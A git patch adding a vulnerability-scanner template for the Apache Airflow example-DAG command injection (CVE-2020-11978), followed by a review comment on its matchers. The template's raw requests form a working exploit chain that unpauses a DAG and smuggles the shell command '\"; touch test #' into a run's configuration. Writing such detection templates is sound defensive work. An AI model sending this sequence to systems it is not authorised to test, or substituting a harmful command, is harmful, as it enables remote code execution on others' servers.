From 6652b2ddb6f5ce1c4852a71165a20a5be59026dc Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Thu, 3 Jun 2021 13:57:09 +0530
Subject: [PATCH] Added CVE-2020-11978
---
cves/2020/CVE-2020-11978.yaml | 65 +++++++++++++++++++++++++++++++++++
1 file changed, 65 insertions(+)
create mode 100644 cves/2020/CVE-2020-11978.yaml
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
new file mode 100644
index 0000000000..e9964eedcd
--- /dev/null
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -0,0 +1,65 @@
+id: CVE-2020-11978
+info:
+ name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+ author: pdteam
+ severity: high
+ description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+ reference: |
+ - https://github.com/pberba/CVE-2020-11978
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+ - https://twitter.com/wugeej/status/1400336603604668418
+ tags: cve,cve2020,apache,airflow,rce
+
+requests:
+ - raw:
+ - |
+ GET /api/experimental/test HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Content-Length: 85
+ Content-Type: application/json
+
+ {"conf": {"message": "\"; touch test #"}}
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+
+ extractors:
+ - type: regex
+ name: exec_date
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - '"execution_date":"([0-9-A-Z:+]+)"'
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_4, "operator":"BashOperator")'
+ - 'contains(all_headers_4, "application/json")'
+ condition: and
+
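Review bot: The first DSL matcher, `contains(body_4, "operator":"BashOperator")`, leaves its inner double quotes unescaped, so the expression engine does not receive `"operator":"BashOperator"` as a single string literal and the check is probably weaker than intended, or fails to compile. Escaping the quotes, for example `- 'contains(body_4, "\"operator\":\"BashOperator\"")'`, would make it match the JSON field as written. Even then, the two matchers only confirm that the fourth response is JSON describing a BashOperator task; nothing visible ties the finding to the affected versions, so a patched instance with example DAGs loaded and the experimental API reachable may also be reported, which deserves a comment in the template or a tighter condition. The template also changes state on the scanned host (it unpauses a DAG and triggers a run), so I would add `intrusive` to `tags` to let operators exclude it from production scans. Separately, `Content-Length: 85` does not appear to match the JSON body shown and is better corrected or dropped.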